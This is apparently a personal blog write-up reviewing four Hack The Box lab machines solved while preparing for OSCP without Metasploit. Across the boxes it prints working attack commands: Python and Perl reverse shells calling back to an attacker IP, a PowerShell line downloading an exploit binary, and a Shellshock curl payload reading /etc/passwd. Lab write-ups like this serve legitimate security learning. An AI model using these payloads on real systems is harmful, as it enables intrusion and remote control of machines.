An OSCP journey without using METASPLOIT- Weekly Review#1

I thought that I would start week 2 with a review of week one. I think its important not to steem too fast ahead and take some time to reflect on the lessons that Hack the box has taught us so far. We will point out some of the key tools, scripts and tips that I have used in the past week to gain root on the boxes so far without using metasploit.

Box 1 Key methodology;

https://bit.ly/2yPStyJ . This box had 1 port open,80 (HTTP), We used Gobuster to and found 10.10.10.68/dev/phpbash.php. As a result of this phpbash backdoor was present it gave us RCE running as user www-data. First logical step was search for what languages was present. “which python(3)” I then use the RSG tool from https://github.com/mthbernardes/rsg (spend time knowing how to quickly generate a reverse or bind shell in at least “Python/perl/bash” Then needed to upgrade your shell i used the following python -c ‘import pty; pty.spawn(“/bin/bash”)’

For Priv Esc -Firstly I used “sudo -l” This showed us that a user called scriptmanager has NOPASSWD:ALL which meant we can run all sudo commnads as scriptmanager, all the files were owend by root bar the exception a folder called scriptmanager then found two files which one file was calling from the other, we replaced the text with the following python code

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((“10.10.14.63”,6666))
os.dup2(s.fileno(),0) -> 
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);

Overall -> Gobuster to view sub-dirs , used RSG to write a reverse shell, used the command python -c ‘import pty; pty.spawn(“/bin/bash”)’ to upgrade the shell. used sudo -l for priv esc (NOPASSWD)

Box 2 Key methodology;

https://bit.ly/3cOUM3Z. This box had port open (HTTP), used Telnet to retrive the banner and identified the HTTP server running Apache2.4.18, viewed the source and found a comment that lead to an opensource blog, used the github page to find further info re-run gobuster against the new subdirectory’s. Remember to use ovbious passwords.

For Priv Esc -Sudo -l -> “echo [/bin/bash” > monitor.sh]-> sudo pathtomonitor.sh

Box 3 Key methodology;

https://bit.ly/2Sefv9D This box had 2 ports open 21 and 80 (FTP and HTTP). Windows IIS they typically run frameworks suchs as ASP or ASPX (.net). Created a aspx reverse tcp connection payload via Msfvenom.Once had a foothold ran the commnad “sysinfo” Enterprise | 6.1.7600 | Windows 7 googled this info I found a priv esc “MS11–046" poc. i686-w64-mingw32-gcc 40564.c -o 40564.exe -lws2_32. Then used a python server to transfer the C code to the victim python -m SimpleHTTPServer 8080 then as wget or curl was not installed used this to donwload the binary.

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.63:8080/40564.exe', 'c:\Users\Public\Downloads\40564.exe')"

Box 4Key methodology;

https://bit.ly/2W53JPJ This box had two ports open 80 (HTTP) and 2222 (SSH) After running Gobuster and finsing the “cgi-bin” . Running a FFUF with a custom wordlist found “user.sh” (the important take away here is rememeber to also bruteforce file extentions such as (sh/php/asp/aspx/py/cgi/html) After a while we established the vulnerability “shellshock” was the pathway in. Main takeaways for shellshock;

Shellshock is a bash remote code execution vulnerability. This vulnerability affected web servers utilizing CGI (Common Gateway Interface), which is a system for generating dynamic web content. This usually involved directories such as /cgi-sys, /cgi-mod, /cgi-bin, etc. /cgi-sys and /cgi-mod do not exist on the web server. cgi-bin does”

A really good tool for Shellshock is http://commixproject.com

To test manually

curl -H “user-agent: () { :; }; echo; echo; /bine/bash -c ‘cat /etc/passwd’”http://xx.xx.xx.xx/cgi-bin/user.sh

For priv esc (root) NOPASSWD: /usr/bin/perl was present I used a Perl reverse tcp shell script

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'